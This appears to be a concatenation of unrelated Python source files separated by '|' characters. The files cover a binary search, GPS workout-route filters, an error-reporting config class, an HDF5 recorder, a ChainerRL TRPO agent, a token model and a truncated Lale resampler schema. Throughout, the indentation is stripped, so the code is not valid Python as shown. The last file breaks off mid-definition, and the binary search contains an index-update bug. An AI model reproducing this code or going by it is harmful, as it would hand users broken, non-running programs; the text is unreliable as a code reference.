""" Binary Search takes array and value to search """
""" returns index or-1"""
count = len(arr)
midpoint = count // 2
start_index = 0
end_index = count - 1
while value != arr[start_index+midpoint] and count > 1:
# import pdb; pdb.set_trace()
if value > arr[midpoint+start_index]:
start_index = midpoint
count = count - (midpoint)
midpoint = count // 2
else:
end_index = end_index - midpoint
count = count - midpoint
midpoint = count // 2
if value == arr[midpoint+start_index]:
return midpoint + start_index
else:
return -1
# print(binary_search([1, 2, 3, 4, 5, 6], 9))
|
import ik.monkey_patching
default_app_config = 'ik.apps.IKAppConfig'
|
from typing import List, Tuple, Dict
from watchlib.utils import WorkoutRoute
from abc import ABC
import numpy as np
import json
from datetime import datetime as dt
class BBox:
min_lon: float
min_lat: float
max_lon: float
max_lat: float
def __init__(self, min_lon, min_lat, max_lon, max_lat):
self.min_lon = min_lon
self.min_lat = min_lat
self.max_lon = max_lon
self.max_lat = max_lat
def get_values(self):
return self.min_lon, self.min_lat, self.max_lon, self.max_lat
class Filter(ABC):
def __init__(self):
pass
def filter() -> List:
pass
# Abstract filter class to filter with bounding boxes
class BBoxFilter(Filter):
def set_routes(self, routes: List[WorkoutRoute]):
self.routes = routes
def route_bboxes(self, routes: List[WorkoutRoute]) -> List[BBox]:
bboxes = []
for route in self.routes:
lat_min, lat_max = route["lat"].min(), route["lat"].max()
lon_min, lon_max = route["lon"].min(), route["lon"].max()
bboxes.append(BBox(lon_min, lat_min, lon_max, lat_max))
return bboxes
class DiagonalBBoxFilter(BBoxFilter):
def __init__(self, diagonal_distance: float):
self.diagonal_distance = diagonal_distance
def __haversine(lat1: float, lat2: float, lon1: float, lon2: float) -> float:
"""
Calculates distance between two points on earth in km
"""
lat1, lat2, lon1, lon2 = np.deg2rad((lat1, lat2, lon1, lon2))
latd = lat2 - lat1
lond = lon2 - lon1
R = 6372.8 # Earth radius in km
d = 2*R*np.arcsin(np.sqrt(np.sin(latd/2)**2 +
np.cos(lat1)*np.cos(lat2)*np.sin(lond/2)**2))
return d
def __haversine_for_route(route: WorkoutRoute) -> float:
lat1, lat2 = route["lat"].min(), route["lat"].max()
lon1, lon2 = route["lon"].min(), route["lon"].max()
return DiagonalBBoxFilter.__haversine(lat1, lat2, lon1, lon2)
@staticmethod
def max_bbox(routes: List[WorkoutRoute]) -> float:
distances = [DiagonalBBoxFilter.__haversine_for_route(
route) for route in routes]
return max(distances)
@staticmethod
def min_bbox(routes: List[WorkoutRoute]) -> float:
distances = [DiagonalBBoxFilter.__haversine_for_route(
route) for route in routes]
return min(distances)
def simple_dist(self, lat1: float, lat2: float, lon1: float, lon2: float) -> Tuple[float, float]:
"""
Calculates distances between two lon and lat values
"""
degree_to_meter = 111139
lond = np.abs(lon1 - lon2)*degree_to_meter
latd = np.abs(lat1 - lat2)*degree_to_meter
return lond, latd
def filter(self, routes: List[WorkoutRoute]) -> List[WorkoutRoute]:
"""
This function uses the diagonal distance between the
boundary box corners to filter out smaller routes based
on a tolerance in km.
"""
print(
f"[Filter]\t\tFiltering out routes with a shorter diagonal than {self.diagonal_distance}km.")
filtered_routes = []
for route in routes:
h = DiagonalBBoxFilter.__haversine_for_route(route)
if h >= self.diagonal_distance:
filtered_routes.append(route)
return filtered_routes
class CountryFilter(BBoxFilter):
countries: Dict[str, BBox] = {
"All": BBox(0, 0, 100, 100),
"Italy": BBox(6.75, 36.62, 18.48, 47.12),
"Germany": BBox(5.98865807458, 47.3024876979, 15.0169958839, 54.983104153),
"Austria": BBox(9.48, 46.43, 16.98, 49.04)
}
def __init__(self, country_bbox: BBox):
self.country_bbox = country_bbox
# self.load_country_bboxes()
def load_country_bboxes(self, path: str):
with open(path, "r") as f:
countries_json = json.load(f)
for country in countries_json:
min_lat = countries_json[country]["sw"]["lat"]
min_lon = countries_json[country]["sw"]["lon"]
max_lat = countries_json[country]["ne"]["lat"]
max_lon = countries_json[country]["ne"]["lon"]
self.countries[country] = BBox(
min_lon, min_lat, max_lon, max_lat)
def check_country_bbox(self, country: str, bbox: BBox) -> bool:
country_bbox = self.countries[country]
min_lon, min_lat, max_lon, max_lat = country_bbox.get_values()
min_lon_r, min_lat_r, max_lon_r, max_lat_r = bbox.get_values()
return (min_lon_r > min_lon) and (min_lat_r > min_lat) and (max_lon_r < max_lon) and (max_lat_r < max_lat)
def route_countries(self, routes: List[WorkoutRoute]) -> List[str]:
countries = []
bboxes = self.route_bboxes(routes)
for bbox in bboxes:
for country in self.countries:
if self.check_country_bbox(country, bbox):
countries.append(country)
return countries
def filter(self, routes: List[WorkoutRoute]) -> List[WorkoutRoute]:
"""
routes: routes that should be filtered
"""
print(f"[Filter]\t\tFiltering only routes from {self.country_bbox}.")
min_lon, min_lat, max_lon, max_lat = self.country_bbox.get_values()
filtered_routes = []
for route in routes:
if (route["lon"].min() >= min_lon) and (route["lon"].max() <= max_lon):
if (route["lat"].min() >= min_lat) and (route["lat"].max() <= max_lat):
filtered_routes.append(route)
return filtered_routes
class TimeFilter(Filter):
def __init__(self, _from: dt = None, _to: dt = None, min_duration_sec=0, max_duration_sec=0):
if _from is None:
self._from = dt.fromtimestamp(0)
else:
self._from = _from
if _to is None:
self._to = dt.now()
else:
self._to = _to
self.min_duration_sec = min_duration_sec
self.max_duration_sec = max_duration_sec
def filter(self, routes: List[WorkoutRoute]) -> List[WorkoutRoute]:
print(
f"[Filter]\t\tFiltering out routes from {self._from.date()} to {self._to.date()} which are {self.min_duration_sec} to {self.max_duration_sec} seconds long.")
filtered_routes = []
for route in routes:
if route.start and route.end and route.duration_sec:
if route.start > self._from and route.end < self._to and route.duration_sec <= self.max_duration_sec and route.duration_sec >= self.min_duration_sec:
filtered_routes.append(route)
return filtered_routes
@staticmethod
def min_time(routes: List[WorkoutRoute]) -> dt:
return min([route.start.timestamp() for route in routes])
@staticmethod
def max_time(routes: List[WorkoutRoute]) -> dt:
return max([route.end.timestamp() for route in routes])
class FilterPipeline:
def __init__(self, filter_names: List[str], filters: List[Filter]):
self.filter_names = filter_names
self.filters = filters
def filter(self, data):
filtered_data = data
for filter in self.filters:
filtered_data = filter.filter(filtered_data)
return filtered_data
|
import os
import socket
from six.moves import zip
from six import iteritems
class Configuration(object):
OPTIONS = (
('api_key', str),
('project_root', str),
('environment', str),
('hostname', str),
('endpoint', str),
('params_filters', list),
('trace_threshold', int)
)
def __init__(self, *args, **kwargs):
self.api_key = ''
self.project_root = os.getcwd()
self.environment = 'production'
self.hostname = socket.gethostname()
self.endpoint = 'https://api.honeybadger.io'
self.params_filters = ['password', 'password_confirmation', 'credit_card']
self.trace_threshold = 2000
self.set_12factor_config()
self.set_config_from_dict(kwargs)
def set_12factor_config(self):
for option in list(zip(*self.OPTIONS))[0]:
val = os.environ.get('HONEYBADGER_{}'.format(option.upper()), getattr(self, option))
option_types = dict(self.OPTIONS)
try:
if option_types[option] is list:
val = val.split(',')
elif option_types[option] is int:
val = int(val)
except:
pass
setattr(self, option, val)
def set_config_from_dict(self, config):
for (key, value) in iteritems(config):
if key in list(zip(*self.OPTIONS))[0]:
setattr(self, key, value)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
import h5py
from ..utility.utils import path
class ArrayRecording(object):
"""
Class for serializing numpy ndarrays.
Each set of numpy arrays are stored with a unique key in the recording dictionary.
Attributes are added in the attributes dictionary and are meant for recording parameters used to generate the numpy arrays.
Constructor params -----
@param filename : Name of the file to write to (without suffix). If no file with this name exists a new one is created when saving.
@param path : Relative path to data files i.e. /data/testdata/ (the absolute path is added automagically)
@return : Recording object which can either record and save numpy arrays or load numpy arrays from existing datafiles.
NOTE: loading clears every dictionary, filename and path
"""
default = 'recording'
def __init__(self, filename=None, path=None):
self.__recording = {}
self.__attributes = {}
self.__filename = filename
self.__path = path
@property
def attributes(self):
return self.__attributes
@property
def recording(self):
return self.__recording
@property
def path(self):
return self.__path
@property
def filename(self):
return self.__filename
def clear(self):
self.__recording = {}
self.__attributes = {}
self.__filename = None
self.__path = None
def add_attribute(self, name, value):
self.__attributes[name] = value
def add_attributes(self, attribute_dict):
for key in attribute_dict:
self.__attributes[key] = attribute_dict[key]
def add_record(self, item, record_name):
if record_name not in self.recording:
self.__recording[record_name] = np.array(item)
else:
self.__recording[record_name] = np.vstack(
[self.recording[record_name], item])
def set_relative_path(self, path):
self.__path = path
def set_filename(self, filename):
self.__filename = ''.join([path(), self.path, filename, '.h5'])
def save(self, filename=None):
if filename is None:
if self.filename is None:
raise ValueError("Set filename first")
filename = self.filename
with h5py.File(filename, 'w') as h5:
for key in self.recording:
h5.create_dataset(key, data=self.recording[key])
for key in self.attributes:
h5.attrs.create(key, self.attributes[key])
def load(self, dataset_names=None, filename=None):
if filename is None:
if self.filename is None:
raise ValueError("Set filename first")
filename = self.filename
self.clear()
with h5py.File(filename, 'r') as h5:
if dataset_names is None:
# If no specific dataset name is given load all.
dataset_names = []
for key in h5.keys():
dataset_names.append(key)
try:
for name in dataset_names:
self.__recording[name] = h5[name][:]
for key in h5.attrs.keys():
self.__attributes[key] = h5.attrs.get(key)
except (EOFError, StopIteration) as e:
raise e.what()
|
pma = 0
pme = 0
for c in range(1, 6):
peso = float(input('Digite o peso da {}º pessoa: Kg'.format(c)))
if c == 1:
pma = peso
pme = peso
else:
if peso>pma:
pma = peso
if peso<pme:
pme = peso
print('O maior peso até agora foi {}Kg'.format((pma)))
print('O menor peso até agora foi {}Kg'.format(pme))
|
# Copyright 2022, Battelle Energy Alliance, LLC
# ALL RIGHTS RESERVED
"""
Test the capapility of loading economic information from HYBRID
Testing the python script (HERON/src/Hybrid2Heron/hybrid2heron_economic.py) that autoloads the needed economic information about a specific component or an element of the grid system from HYBRID text files to a HERON input xml file.
"""
import os
import sys
# Execute the python script located at src/Hybrid2Heron
HYBRID_autoloader_path = os.path.dirname(os.path.abspath(__file__)).split("HERON")[0] + "HERON/src/Hybrid2Heron/hybrid2heron_economic.py"
exec(open(HYBRID_autoloader_path).read())
|
from datetime import datetime, timedelta
from sqlalchemy import Column, DateTime, ForeignKey, Integer, String
from sqlalchemy.orm import relationship
from app.models import orm
from app.models.orm import Base
from app.util.passwords import generate_access_token
def create_expiration_date():
return datetime.now() + timedelta(days=7)
def default_token_type():
return "bearer"
class Token(Base):
id = Column(Integer, primary_key=True)
access_token = Column(String, default=generate_access_token, nullable=False)
refresh_token = Column(String, default=generate_access_token, nullable=False)
token_type = Column(String, default=default_token_type)
actor_id = Column(Integer, ForeignKey("actor.id"))
actor = relationship("RegisteredActor", back_populates="token")
expiration_date = Column(DateTime, default=create_expiration_date)
# user_agent = Column(String)
def __init__(self, actor: orm.RegisteredActor):
self.actor = actor
def update(self):
self.access_token = generate_access_token()
self.refresh_token = generate_access_token()
self.expiration_date = create_expiration_date()
|
import re
import os
from pathlib import Path
from distutils.dir_util import copy_tree
SRC_DIR = '/Users/petergish/Nucleus/PersonalTime/PyQt/Fantasy_Creator'
DEST_DIR = '/Volumes/Skylab/Fantasy_Creator_source'
MODULE_PREFIX = 'fantasycreator'
EXCLUDED_DIRS = ('.vscode', '.git', 'fantasycreator/resources', '__pycache__')
EXCLUDED_FILES = ('moduleConverter.py', 'config.py', 'resources.py', 'run.py',
'setup.py')
MODULE_FILES = []
# Copy entire dev tree
try:
copy_tree(SRC_DIR, DEST_DIR)
except:
print('Could not access external drive. Aborting...')
exit()
for path in Path(DEST_DIR).rglob('*.py'):
if path.name not in EXCLUDED_FILES and not path.name.startswith('__'):
MODULE_FILES.append(path)
for current_file in MODULE_FILES:
with open(current_file, 'r') as read_file:
contents = read_file.readlines()
found_imports = False
line_count = 0
for line in contents:
if not line.startswith(('class', 'def', '# BREAK')):
if found_imports and line != '\n':
# print([ord(c) for c in line])
if line.startswith('from'): # importing user module
line = f'from {MODULE_PREFIX}.' + line[len('from '):]
elif line.startswith('import'): # import resources
line = f'from {MODULE_PREFIX} ' + line
contents[line_count] = line
elif re.sub(r'\s', '', line.rstrip()).casefold() in ('#user-definedmodules',
'#externalresources'):
found_imports = True
line_count += 1
else:
break
if current_file.name == 'mainWindow.py':
cutoff = 0
for line in reversed(contents):
cutoff += 1
if re.sub(r'\s', '', line.strip()).casefold() == '#non-bundledexecution':
break
contents = contents[:-(cutoff+1)]
with open(f'{current_file}', 'w') as write_file:
write_file.writelines(contents)
|
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import absolute_import
from builtins import * # NOQA
from future import standard_library
standard_library.install_aliases() # NOQA
import collections
import itertools
from logging import getLogger
import chainer
import chainer.functions as F
import numpy as np
import chainerrl
from chainerrl import agent
from chainerrl.misc.batch_states import batch_states
def _get_ordered_params(link):
"""Get a list of parameters sorted by parameter names."""
name_param_pairs = list(link.namedparams())
ordered_name_param_pairs = sorted(name_param_pairs, key=lambda x: x[0])
return [x[1] for x in ordered_name_param_pairs]
def _flatten_and_concat_variables(vs):
"""Flatten and concat variables to make a single flat vector variable."""
return F.concat([F.flatten(v) for v in vs], axis=0)
def _as_ndarray(x):
"""chainer.Variable or ndarray -> ndarray."""
if isinstance(x, chainer.Variable):
return x.array
else:
return x
def _flatten_and_concat_ndarrays(vs):
"""Flatten and concat variables to make a single flat vector ndarray."""
xp = chainer.cuda.get_array_module(vs[0])
return xp.concatenate([_as_ndarray(v).ravel() for v in vs], axis=0)
def _split_and_reshape_to_ndarrays(flat_v, sizes, shapes):
"""Split and reshape a single flat vector to make a list of ndarrays."""
xp = chainer.cuda.get_array_module(flat_v)
sections = np.cumsum(sizes)
vs = xp.split(flat_v, sections)
return [v.reshape(shape) for v, shape in zip(vs, shapes)]
def _replace_params_data(params, new_params_data):
"""Replace data of params with new data."""
for param, new_param_data in zip(params, new_params_data):
assert param.shape == new_param_data.shape
param.array[:] = new_param_data
def _hessian_vector_product(flat_grads, params, vec):
"""Compute hessian vector product efficiently by backprop."""
grads = chainer.grad([F.sum(flat_grads * vec)], params)
assert all(grad is not None for grad in grads),\
"The Hessian-vector product contains None."
grads_data = [grad.array for grad in grads]
return _flatten_and_concat_ndarrays(grads_data)
def _mean_or_nan(xs):
"""Return its mean a non-empty sequence, numpy.nan for a empty one."""
return np.mean(xs) if xs else np.nan
def _find_old_style_function(outputs):
"""Find old-style functions in the computational graph."""
found = []
for v in outputs:
assert isinstance(v, (chainer.Variable, chainer.variable.VariableNode))
if v.creator is None:
continue
if isinstance(v.creator, chainer.Function):
found.append(v.creator)
else:
assert isinstance(v.creator, chainer.FunctionNode)
found.extend(_find_old_style_function(v.creator.inputs))
return found
class TRPO(agent.AttributeSavingMixin, agent.Agent):
"""Trust Region Policy Optimization.
A given stochastic policy is optimized by the TRPO algorithm. A given
value function is also trained to predict by the TD(lambda) algorithm and
used for Generalized Advantage Estimation (GAE).
Since the policy is optimized via the conjugate gradient method and line
search while the value function is optimized via SGD, these two models
should be separate.
Since TRPO requires second-order derivatives to compute Hessian-vector
products, Chainer v3.0.0 or newer is required. In addition, your policy
must contain only functions that support second-order derivatives.
See https://arxiv.org/abs/1502.05477 for TRPO.
See https://arxiv.org/abs/1506.02438 for GAE.
Args:
policy (Policy): Stochastic policy. Its forward computation must
contain only functions that support second-order derivatives.
Recurrent models are not supported.
vf (ValueFunction): Value function. Recurrent models are not supported.
vf_optimizer (chainer.Optimizer): Optimizer for the value function.
obs_normalizer (chainerrl.links.EmpiricalNormalization or None):
If set to chainerrl.links.EmpiricalNormalization, it is used to
normalize observations based on the empirical mean and standard
deviation of observations. These statistics are updated after
computing advantages and target values and before updating the
policy and the value function.
gamma (float): Discount factor [0, 1]
lambd (float): Lambda-return factor [0, 1]
phi (callable): Feature extractor function
entropy_coef (float): Weight coefficient for entropoy bonus [0, inf)
update_interval (int): Interval steps of TRPO iterations. Every after
this amount of steps, this agent updates the policy and the value
function using data from these steps.
vf_epochs (int): Number of epochs for which the value function is
trained on each TRPO iteration.
vf_batch_size (int): Batch size of SGD for the value function.
standardize_advantages (bool): Use standardized advantages on updates
line_search_max_backtrack (int): Maximum number of backtracking in line
search to tune step sizes of policy updates.
conjugate_gradient_max_iter (int): Maximum number of iterations in
the conjugate gradient method.
conjugate_gradient_damping (float): Damping factor used in the
conjugate gradient method.
act_deterministically (bool): If set to True, choose most probable
actions in the act method instead of sampling from distributions.
value_stats_window (int): Window size used to compute statistics
of value predictions.
entropy_stats_window (int): Window size used to compute statistics
of entropy of action distributions.
kl_stats_window (int): Window size used to compute statistics
of KL divergence between old and new policies.
policy_step_size_stats_window (int): Window size used to compute
statistics of step sizes of policy updates.
Statistics:
average_value: Average of value predictions on non-terminal states.
It's updated before the value function is updated.
average_entropy: Average of entropy of action distributions on
non-terminal states. It's updated on act_and_train.
average_kl: Average of KL divergence between old and new policies.
It's updated after the policy is updated.
average_policy_step_size: Average of step sizes of policy updates
It's updated after the policy is updated.
"""
saved_attributes = ['policy', 'vf', 'vf_optimizer', 'obs_normalizer']
def __init__(self,
policy,
vf,
vf_optimizer,
obs_normalizer=None,
gamma=0.99,
lambd=0.95,
phi=lambda x: x,
entropy_coef=0.01,
update_interval=2048,
max_kl=0.01,
vf_epochs=3,
vf_batch_size=64,
standardize_advantages=True,
line_search_max_backtrack=10,
conjugate_gradient_max_iter=10,
conjugate_gradient_damping=1e-2,
act_deterministically=False,
value_stats_window=1000,
entropy_stats_window=1000,
kl_stats_window=100,
policy_step_size_stats_window=100,
logger=getLogger(__name__),
):
self.policy = policy
self.vf = vf
self.vf_optimizer = vf_optimizer
self.obs_normalizer = obs_normalizer
self.gamma = gamma
self.lambd = lambd
self.phi = phi
self.entropy_coef = entropy_coef
self.update_interval = update_interval
self.max_kl = max_kl
self.vf_epochs = vf_epochs
self.vf_batch_size = vf_batch_size
self.standardize_advantages = standardize_advantages
self.line_search_max_backtrack = line_search_max_backtrack
self.conjugate_gradient_max_iter = conjugate_gradient_max_iter
self.conjugate_gradient_damping = conjugate_gradient_damping
self.act_deterministically = act_deterministically
self.logger = logger
self.value_record = collections.deque(maxlen=value_stats_window)
self.entropy_record = collections.deque(maxlen=entropy_stats_window)
self.kl_record = collections.deque(maxlen=kl_stats_window)
self.policy_step_size_record = collections.deque(
maxlen=policy_step_size_stats_window)
assert self.policy.xp is self.vf.xp,\
'policy and vf should be in the same device.'
if self.obs_normalizer is not None:
assert self.policy.xp is self.obs_normalizer.xp,\
'policy and obs_normalizer should be in the same device.'
self.xp = self.policy.xp
self.last_state = None
self.last_action = None
# Contains episodes used for next update iteration
self.memory = []
# Contains transitions of the last episode not moved to self.memory yet
self.last_episode = []
def _update_if_dataset_is_ready(self):
dataset_size = (
sum(len(episode) for episode in self.memory)
+ len(self.last_episode))
if dataset_size >= self.update_interval:
self._flush_last_episode()
dataset = self._make_dataset()
self._update(dataset)
self.memory = []
def _make_dataset(self):
dataset = list(itertools.chain.from_iterable(self.memory))
xp = self.vf.xp
# Compute v_pred and next_v_pred
states = batch_states([b['state'] for b in dataset], xp, self.phi)
next_states = batch_states([b['next_state']
for b in dataset], xp, self.phi)
if self.obs_normalizer:
states = self.obs_normalizer(states, update=False)
next_states = self.obs_normalizer(next_states, update=False)
with chainer.using_config('train', False), chainer.no_backprop_mode():
vs_pred = chainer.cuda.to_cpu(self.vf(states).array.ravel())
next_vs_pred = chainer.cuda.to_cpu(
self.vf(next_states).array.ravel())
for transition, v_pred, next_v_pred in zip(dataset,
vs_pred,
next_vs_pred):
transition['v_pred'] = v_pred
transition['next_v_pred'] = next_v_pred
# Update stats
self.value_record.extend(vs_pred)
# Compute adv and v_teacher
for episode in self.memory:
adv = 0.0
for transition in reversed(episode):
td_err = (
transition['reward']
+ (self.gamma * transition['nonterminal']
* transition['next_v_pred'])
- transition['v_pred']
)
adv = td_err + self.gamma * self.lambd * adv
transition['adv'] = adv
transition['v_teacher'] = adv + transition['v_pred']
return dataset
def _flush_last_episode(self):
if self.last_episode:
self.memory.append(self.last_episode)
self.last_episode = []
def _update(self, dataset):
"""Update both the policy and the value function."""
if self.obs_normalizer:
self._update_obs_normalizer(dataset)
self._update_policy(dataset)
self._update_vf(dataset)
def _update_obs_normalizer(self, dataset):
assert self.obs_normalizer
states = batch_states(
[b['state'] for b in dataset], self.obs_normalizer.xp, self.phi)
self.obs_normalizer.experience(states)
def _update_vf(self, dataset):
"""Update the value function using a given dataset.
The value function is updated via SGD to minimize TD(lambda) errors.
"""
xp = self.vf.xp
assert 'state' in dataset[0]
assert 'v_teacher' in dataset[0]
dataset_iter = chainer.iterators.SerialIterator(
dataset, self.vf_batch_size)
while dataset_iter.epoch < self.vf_epochs:
batch = dataset_iter.__next__()
states = batch_states([b['state'] for b in batch], xp, self.phi)
if self.obs_normalizer:
states = self.obs_normalizer(states, update=False)
vs_teacher = xp.array(
[b['v_teacher'] for b in batch], dtype=xp.float32)
vs_pred = self.vf(states)
vf_loss = F.mean_squared_error(vs_pred, vs_teacher[..., None])
self.vf_optimizer.update(lambda: vf_loss)
def _compute_gain(self, action_distrib, action_distrib_old, actions, advs):
"""Compute a gain to maximize."""
prob_ratio = F.exp(action_distrib.log_prob(actions)
- action_distrib_old.log_prob(actions))
mean_entropy = F.mean(action_distrib.entropy)
surrogate_gain = F.mean(prob_ratio * advs)
return surrogate_gain + self.entropy_coef * mean_entropy
def _update_policy(self, dataset):
"""Update the policy using a given dataset.
The policy is updated via CG and line search.
"""
assert 'state' in dataset[0]
assert 'action' in dataset[0]
assert 'adv' in dataset[0]
# Use full-batch
xp = self.policy.xp
states = batch_states([b['state'] for b in dataset], xp, self.phi)
if self.obs_normalizer:
states = self.obs_normalizer(states, update=False)
actions = xp.array([b['action'] for b in dataset])
advs = xp.array([b['adv'] for b in dataset], dtype=np.float32)
if self.standardize_advantages:
mean_advs = xp.mean(advs)
std_advs = xp.std(advs)
advs = (advs - mean_advs) / (std_advs + 1e-8)
# Recompute action distributions for batch backprop
action_distrib = self.policy(states)
action_distrib_old = action_distrib.copy()
gain = self._compute_gain(
action_distrib=action_distrib,
action_distrib_old=action_distrib_old,
actions=actions,
advs=advs)
full_step = self._compute_kl_constrained_step(
action_distrib=action_distrib,
action_distrib_old=action_distrib_old,
gain=gain)
self._line_search(
full_step=full_step,
states=states,
actions=actions,
advs=advs,
action_distrib_old=action_distrib_old,
gain=gain)
def _compute_kl_constrained_step(self, action_distrib, action_distrib_old,
gain):
"""Compute a step of policy parameters with a KL constraint."""
policy_params = _get_ordered_params(self.policy)
kl = F.mean(action_distrib_old.kl(action_distrib))
# Check if kl computation fully supports double backprop
old_style_funcs = _find_old_style_function([kl])
if old_style_funcs:
raise RuntimeError("""\
Old-style functions (chainer.Function) are used to compute KL divergence.
Since TRPO requires second-order derivative of KL divergence, its computation
should be done with new-style functions (chainer.FunctionNode) only.
Found old-style functions: {}""".format(old_style_funcs))
kl_grads = chainer.grad([kl], policy_params,
enable_double_backprop=True)
assert all(g is not None for g in kl_grads), "\
The gradient contains None. The policy may have unused parameters."
flat_kl_grads = _flatten_and_concat_variables(kl_grads)
def fisher_vector_product_func(vec):
fvp = _hessian_vector_product(flat_kl_grads, policy_params, vec)
return fvp + self.conjugate_gradient_damping * vec
gain_grads = chainer.grad([gain], policy_params)
assert all(g is not None for g in kl_grads), "\
The gradient contains None. The policy may have unused parameters."
flat_gain_grads = _flatten_and_concat_ndarrays(gain_grads)
step_direction = chainerrl.misc.conjugate_gradient(
fisher_vector_product_func, flat_gain_grads,
max_iter=self.conjugate_gradient_max_iter,
)
# We want a step size that satisfies KL(old|new) < max_kl.
# Let d = alpha * step_direction be the actual parameter updates.
# The second-order approximation of KL divergence is:
# KL(old|new) = 1/2 d^T I d + O(||d||^3),
# where I is a Fisher information matrix.
# Substitute d = alpha * step_direction and solve KL(old|new) = max_kl
# for alpha to get the step size that tightly satisfies the constraint.
dId = float(step_direction.dot(
fisher_vector_product_func(step_direction)))
scale = (2.0 * self.max_kl / (dId + 1e-8)) ** 0.5
return scale * step_direction
def _line_search(self, full_step, states, actions, advs,
action_distrib_old, gain):
"""Do line search for a safe step size."""
xp = self.policy.xp
policy_params = _get_ordered_params(self.policy)
policy_params_sizes = [param.size for param in policy_params]
policy_params_shapes = [param.shape for param in policy_params]
step_size = 1.0
flat_params = _flatten_and_concat_ndarrays(policy_params)
for i in range(self.line_search_max_backtrack + 1):
self.logger.info(
'Line search iteration: %s step size: %s', i, step_size)
new_flat_params = flat_params + step_size * full_step
new_params = _split_and_reshape_to_ndarrays(
new_flat_params,
sizes=policy_params_sizes,
shapes=policy_params_shapes,
)
_replace_params_data(policy_params, new_params)
with chainer.using_config('train', False),\
chainer.no_backprop_mode():
new_action_distrib = self.policy(states)
new_gain = self._compute_gain(
action_distrib=new_action_distrib,
action_distrib_old=action_distrib_old,
actions=actions,
advs=advs)
new_kl = F.mean(action_distrib_old.kl(new_action_distrib))
improve = new_gain.array - gain.array
self.logger.info(
'Surrogate objective improve: %s', float(improve))
self.logger.info('KL divergence: %s', float(new_kl.array))
if not xp.isfinite(new_gain.array):
self.logger.info(
"Surrogate objective is not finite. Bakctracking...")
elif not xp.isfinite(new_kl.array):
self.logger.info(
"KL divergence is not finite. Bakctracking...")
elif improve < 0:
self.logger.info(
"Surrogate objective didn't improve. Bakctracking...")
elif float(new_kl.array) > self.max_kl:
self.logger.info(
"KL divergence exceeds max_kl. Bakctracking...")
else:
self.kl_record.append(float(new_kl.array))
self.policy_step_size_record.append(step_size)
break
step_size *= 0.5
else:
self.logger.info("\
Line search coundn't find a good step size. The policy was not updated.")
self.policy_step_size_record.append(0.)
_replace_params_data(
policy_params,
_split_and_reshape_to_ndarrays(
flat_params,
sizes=policy_params_sizes,
shapes=policy_params_shapes),
)
def act_and_train(self, state, reward):
xp = self.xp
b_state = batch_states([state], xp, self.phi)
if self.obs_normalizer:
b_state = self.obs_normalizer(b_state, update=False)
# action_distrib will be recomputed when computing gradients
with chainer.using_config('train', False), chainer.no_backprop_mode():
action_distrib = self.policy(b_state)
action = chainer.cuda.to_cpu(action_distrib.sample().array)[0]
self.entropy_record.append(float(action_distrib.entropy.array))
self.logger.debug('action_distrib: %s', action_distrib)
self.logger.debug('action: %s', action)
if self.last_state is not None:
self.last_episode.append({
'state': self.last_state,
'action': self.last_action,
'reward': reward,
'next_state': state,
'nonterminal': 1.0,
})
self.last_state = state
self.last_action = action
self._update_if_dataset_is_ready()
return action
def act(self, state):
xp = self.xp
b_state = batch_states([state], xp, self.phi)
if self.obs_normalizer:
b_state = self.obs_normalizer(b_state, update=False)
with chainer.using_config('train', False), chainer.no_backprop_mode():
action_distrib = self.policy(b_state)
if self.act_deterministically:
action = chainer.cuda.to_cpu(
action_distrib.most_probable.array)[0]
else:
action = chainer.cuda.to_cpu(action_distrib.sample().array)[0]
return action
def stop_episode_and_train(self, state, reward, done=False):
assert self.last_state is not None
self.last_episode.append({
'state': self.last_state,
'action': self.last_action,
'reward': reward,
'next_state': state,
'nonterminal': 0.0 if done else 1.0,
})
self.last_state = None
self.last_action = None
self._flush_last_episode()
self.stop_episode()
self._update_if_dataset_is_ready()
def stop_episode(self):
pass
def get_statistics(self):
return [
('average_value', _mean_or_nan(self.value_record)),
('average_entropy', _mean_or_nan(self.entropy_record)),
('average_kl', _mean_or_nan(self.kl_record)),
('average_policy_step_size',
_mean_or_nan(self.policy_step_size_record)),
]
|
# Copyright 2019 IBM Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class _BaseResamplerImpl:
def __init__(self, operator=None, resampler=None):
self.operator = operator
self.resampler = resampler
def fit(self, X, y=None):
X, y = self.resampler.fit_resample(X, y)
self.trained_operator = self.operator.fit(X, y)
return self
def transform(self, X, y=None):
return self.trained_operator.transform(X, y)
def predict(self, X):
return self.trained_operator.predict(X)
def predict_proba(self, X):
return self.trained_operator.predict_proba(X)
def decision_function(self, X):
return self.trained_operator.decision_function(X)
_input_fit_schema = {
"type": "object",
"required": ["X", "y"],
"additionalProperties": False,
"properties": {
"X": {
"description": "Features; the outer array is over samples.",
"type": "array",
"items": {"type": "array", "items": {"type": "number"}},
},
"y": {
"description": "Target class labels; the array is over samples.",
"anyOf": [
{"type": "array", "items": {"type": "number"}},
{"type": "array", "items": {"type": "string"}},
],
},
},
}
_input_transform_schema = {
"type": "object",
"required": ["X", "y"],
"additionalProperties": False,
"properties": {
"X": {
"description": "Features; the outer array is over samples.",
"type": "array",
"items": {"type": "array", "items": {"type": "number"}},
},
"y": {
"description": "Target class labels; the array is over samples.",
"anyOf": [
{"type": "array", "items": {"type": "number"}},
{"type": "array", "items": {"type": "string"}},
{"enum": [None]},
],
},
},
}
_output_transform_schema = {
"description": "Output data schema for transformed data.",
"laleType": "Any",
}
_input_predict_schema = {
"type": "object",
"required": ["X"],
"additionalProperties": False,
"properties": {
"X": {
"description": "Features; the outer array is over samples.",
"type": "array",
"items": {"type": "array", "items": {"type": "number"}},
}
},
}
_output_predict_schema = {
"description": "Output data schema for predictions.",
"laleType": "Any",
}
_input_predict_proba_schema = {
"type": "object",
"required": ["X"],
"additionalProperties": False,
"properties": {
"X": {
"description": "Features; the outer array is over samples.",
"type": "array",
"items": {"type": "array", "items": {"type": "number"}},
}
},
}
_output_predict_proba_schema = {
"description": "Output data schema for predictions.",
"laleType": "Any",
}
_input_decision_function_schema = {
"type": "object",
"required": ["X"],
"additionalProperties": False,
"properties": {
"X": {
"description": "Features; the outer array is over samples.",
"type": "array",
"items": {"type": "array", "items": {"type": "number"}},
}
},
}
_output_decision_function_schema = {
